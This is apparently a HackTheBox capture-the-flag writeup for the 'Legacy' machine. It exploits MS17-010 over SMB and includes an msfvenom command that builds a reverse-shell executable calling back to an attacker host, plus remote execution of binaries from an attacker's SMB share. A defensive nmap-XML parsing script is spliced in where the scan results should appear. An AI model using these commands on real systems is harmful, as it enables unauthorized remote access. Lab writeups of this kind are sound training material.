HackTheBox Legacy Writeup

Enjoy reading my HTB Legacy Writeup

Information Gathering

Let's begin with a basic nmap scan to gather information about the services running on the target machine:

sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.4

Nmap also found that you can connect to the Samba share using the guest account.

I tried several ways of enumerating the SMB share, e.g. using smbclient with the -L flag to list all the shares or smbmap -H 10.10.10.4, but had no success.

Next, I searched for possible vulnerabilities using nmap in combination with NSE scripts:

nmap --script smb-vuln* -p 139,445 -v 10.10.10.4 -Pn

We got two hits:
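Triage of results like these across more than one host is easier from nmap's XML output (-oX) than from the screen. The following is an added example, not part of the original writeup: a small Python parser that lists every host where an smb-vuln-* NSE script reported a VULNERABLE state, so the hosts can be queued for patching or SMBv1 removal. The XML sample is constructed to mimic the layout of nmap's vulns library (a `<script id="...">` under `<hostscript>` with a `<table>` per finding holding an `<elem key="state">`); that layout and the second host's address are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape nmap -oX writes for NSE vuln scripts
# (assumption, not real scan output): one host flagged, one host clean.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="ms17-010">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="ms17-010">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def vulnerable_hosts(xml_text):
    """Return {ipv4: [script ids]} for hosts where an smb-vuln-* script
    reported a state starting with VULNERABLE or LIKELY VULNERABLE."""
    findings = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue  # skip hosts without an IPv4 address element
        ip = addr.get("addr")
        for script in host.iter("script"):
            sid = script.get("id", "")
            if not sid.startswith("smb-vuln-"):
                continue
            for elem in script.iter("elem"):
                state = (elem.text or "").strip().upper()
                if elem.get("key") == "state" and state.startswith(("VULNERABLE", "LIKELY VULNERABLE")):
                    findings.setdefault(ip, []).append(sid)
                    break  # one positive state is enough per script
    return findings


if __name__ == "__main__":
    for ip, scripts in sorted(vulnerable_hosts(SAMPLE_XML).items()):
        print(f"{ip}: {', '.join(scripts)} -> patch, isolate, and disable SMBv1")
```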


MS17-010

First, let's create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f exe > payload.exe

Now we can use the send_and_execute.py script from this GitHub repo to transfer our payload and gain a reverse shell on our netcat listener.

Our shell spawns in C:\WINDOWS\system32, so we probably have high privileges. Unfortunately, we cannot confirm this using whoami because that executable does not exist on the server. I first thought about downloading it using curl, but curl wasn't recognized either.

Next, I tried it with an SMB share using the smbserver script from impacket. With sudo smbserver.py pubshare /home/user/Desktop I created a share that contains the whoami binary for Windows.

Now on the HTB Legacy machine, I executed that executable with:

\\10.10.16.180\pubshare\whoami.exe

That confirmed that we have NT AUTHORITY\SYSTEM permissions.

C:\WINDOWS\system32>\\10.10.16.180\pubshare\whoami.exe
\\10.10.16.180\pubshare\whoami.exe
NT AUTHORITY\SYSTEM

Obtaining the shells

Navigate to: C:\Documents and Settings\john\Desktop to get the user flag. The root flag is located in C:\Documents and Settings\Administrator\Desktop.


Tags:

HTB, HackTheBox, Legacy, MS17-010